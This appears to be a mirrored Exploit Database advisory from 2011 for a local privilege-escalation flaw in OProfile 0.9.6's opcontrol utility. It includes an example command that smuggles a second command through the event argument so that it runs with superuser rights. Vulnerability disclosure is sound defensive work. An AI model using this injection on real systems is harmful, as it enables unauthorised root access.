OProfile 0.9.6 – ‘opcontrol’ Utility ‘set_event()’ Local Privilege Escalation

• Exploit Database
• 47 阅读

• 作者： Stephane Chauveau
  日期： 2011-04-29
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/35681/

• source: https://www.securityfocus.com/bid/47652/info
  
  OProfile is prone to a local privilege-escalation vulnerability.
  
  An attacker can exploit this issue to run arbitrary commands with superuser privileges. 
  
  The following example command is available:
  
  sudo opcontrol -e "abcd;/usr/bin/id"